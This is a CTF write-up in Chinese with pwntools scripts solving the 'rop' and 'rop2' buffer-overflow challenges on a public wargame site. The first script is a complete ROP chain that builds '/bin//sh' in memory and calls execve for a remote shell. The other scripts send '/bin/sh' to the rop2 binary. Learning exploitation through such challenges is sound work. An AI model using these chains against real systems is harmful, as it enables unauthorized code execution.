# rop和rop2的题目的wp

https://hackme.inndy.tw/scoreboard/ 上的题目很有趣。我做了 rop 和 rop2 这两道题，感觉还不错，把 wp 分享出来，方便大家学习。

rop的要求是：

nc hackme.inndy.tw 7704
Tips: Buffer Overflow, ROP

main函数：

overflow函数：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
from struct import pack
# 32-bit Linux target; log_level='debug' dumps every byte sent/received, which
# is what you want when a chain stops one gadget short.
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

# Python 2 script (raw_input, str payloads). Pausing here leaves time to attach
# a debugger when the commented-out local process() line is used instead.
raw_input('debug:')

# Unused below: the chain writes its own "/bin//sh" string into .data instead.
shellcode="/home/flag"
#  print disasm(shellcode)

elf = ELF('/home/h11p/hackme/rop')
# Distance from the start of the overflowed buffer to the saved return address.
offset = 16

#io = process('/home/h11p/hackme/rop')

io = remote('hackme.inndy.tw', 7704)
#bof=0x080488B7

###https://www.slideshare.net/hackstuff/rop-40525248
# Chain overview (all gadgets are absolute 0x08xxxxxx addresses, so the binary
# is presumably non-PIE -- confirm with checksec):
#   1. write '/bin' to .data, '//sh' to .data+4, and a zero dword to .data+8,
#      giving a NUL-terminated "/bin//sh" in writable memory;
#   2. ebx = &"/bin//sh", ecx = edx = .data+8 (the zero dword, i.e. NULL
#      argv / envp);
#   3. eax = 11 (execve on 32-bit Linux: xor + eleven inc), then int 0x80.
# Mitigation note: this only works because the string lands at a fixed address
# and the overflow reaches the return address unchecked (no canary observed).
p = 'A' * offset
# -- step 1: build "/bin//sh\0" in .data -------------------------------------
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret   (NUL terminator)
# -- step 2: syscall arguments ------------------------------------------------
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data            -> ebx = filename
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8        -> ecx = argv (points at 0)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8        -> edx = envp (points at 0)
# -- step 3: eax = 11, then trap into the kernel --------------------------------
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

#debug()
io.sendline(p)
io.interactive()
io.close()

rop2的要求是：

nc hackme.inndy.tw 7703
ROPgadget not working anymore

main函数：

overflow函数：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import time
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

# Python 2 script; the pause gives time to attach a debugger to the local process.
raw_input('debug:')

elf = ELF('/home/h11p/hackme/rop2')

# Sent verbatim as the "ropchain" -- no gadget addresses in this script, only
# the string itself. The p32() alternative below is an earlier experiment.
shellcode='/bin//sh'
#shellcode=p32(0x0804847C)
# Duplicate of the ELF() call above; harmless but redundant.
elf = ELF('/home/h11p/hackme/rop2')
# Not used by anything below.
offset = 16

io = process('/home/h11p/hackme/rop2')

#io = remote('hackme.inndy.tw', 7703)

# NOTE(review): debug() is not defined in this file and I do not believe
# `from pwn import *` provides it -- it looks like a helper from the author's
# own environment (e.g. a gdb.attach wrapper). As pasted, this line raises
# NameError before anything is sent.
debug()
io.recvuntil('Can you solve this?\nGive me your ropchain:')
io.send(shellcode)
# One short read so the program's response shows up in the debug log before
# handing the terminal over.
io.recvline(timeout=3)

io.interactive()

io.close()


# Everything from here on runs after the connection is closed and is never
# sent: leftover payloads from probing the buffer layout (note the second
# payload2 assignment simply overwrites the first).
payload = 'a'*16
payload += p32(0x8)

payload2 = 'a'*4 +'b'*4+'c'*4
payload2 += p32(0x0)

payload2 = 'a'*4 +'b'*4+'c'*4
payload2 += p32(0x0)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *
context(log_level = "debug", terminal = ["deepin-terminal", "-x", "sh", "-c"])

# Loaded for reference only; nothing below reads it.
elf = ELF("./rop2")

# Local run. The program is given the NUL-terminated string "/bin/sh" as its
# whole input and a shell comes back (the "getshell" result below), so no
# gadget chain is needed for rop2 -- presumably the binary itself passes the
# input on to a shell/exec call; confirm in the disassembly.
io = process("./rop2")
io.send("/bin/sh\0")
io.interactive()
io.close()


getshell